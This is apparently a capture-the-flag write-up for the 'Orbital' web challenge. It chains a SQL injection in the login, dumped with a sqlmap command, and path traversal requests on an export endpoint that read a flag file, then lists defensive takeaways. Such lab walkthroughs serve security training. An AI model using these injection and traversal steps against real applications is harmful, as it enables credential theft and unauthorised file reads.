2023 Cyber Apocalypse: Orbital

#htb #ctf #web #sql-injection #path-traversal #sqlmap

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryWeb
ChallengeOrbital

Summary

This web challenge involves exploiting a SQL injection vulnerability in the login functionality, discovering database credentials, and then using path traversal in a file export feature to retrieve the flag file from the system.

Analysis

Vulnerability 1: SQL Injection

The database.py file shows vulnerable SQL query construction. The login endpoint accepts a username parameter that is directly inserted into an SQL query without proper escaping.

Vulnerability 2: Path Traversal

After authentication, an export endpoint allows downloading files but doesn’t properly validate the file path, allowing directory traversal using ../ sequences.

Flag Location: The Dockerfile reveals the flag is at /signal_sleuth_firmware

Solution

Step 1: Exploit SQL Injection with sqlmap

Save the intercepted POST request to a file:

POST /login HTTP/1.1
Host: target
Content-Type: application/json


{"username":"test","password":"test"}

Run sqlmap:

Terminal window
sqlmap -r request.txt -D orbital -T users --dump

This extracts:

  • Database name: orbital
  • Tables: users, and others
  • Credentials with MD5 hashes that can be cracked

Step 2: Login with valid credentials

After obtaining credentials, authenticate to the application.

Step 3: Exploit Path Traversal

Once authenticated, use the export endpoint with path traversal:

/export?file=../../../signal_sleuth_firmware

Or:

GET /api/export?file=../../../../signal_sleuth_firmware HTTP/1.1

This downloads the flag file from the filesystem.

Alternatively, using direct SQLi on export endpoint:

POST /export HTTP/1.1
...
{"file":"../../../signal_sleuth_firmware"}

Key Takeaways

  • SQL injection remains one of the most critical web vulnerabilities
  • Automated tools like sqlmap accelerate exploitation
  • Path traversal vulnerabilities enable arbitrary file read
  • Multiple vulnerabilities can be chained for greater impact
  • Input validation must occur at all layers
  • File operations must validate paths and use whitelisting
  • Database access controls should be properly configured